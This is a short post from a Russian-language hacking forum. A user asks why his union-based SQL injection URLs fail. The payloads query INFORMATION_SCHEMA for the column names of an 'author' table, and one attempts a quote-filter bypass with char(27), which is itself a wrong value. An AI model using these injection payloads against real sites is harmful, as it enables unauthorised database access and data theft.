HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу SQL injection полный FAQ
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 23.11.2009, 12:17
Dr.Gonzo
Познающий
Регистрация: 26.02.2009
Сообщений: 34
С нами: 9054709

Репутация: 18
По умолчанию
подскажите пожалуйста, что делать, если на запрос
.../?id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME='author'+LIMIT+1,1+--
выводится mysql_fetch_array(): supplied argument is not a valid MySQL result resource...

похоже, что фильтруется кавычка, но
.../?id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME=char(27)+author+char(27) +LIMIT+1,1+--
выводит ту же ошибку
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.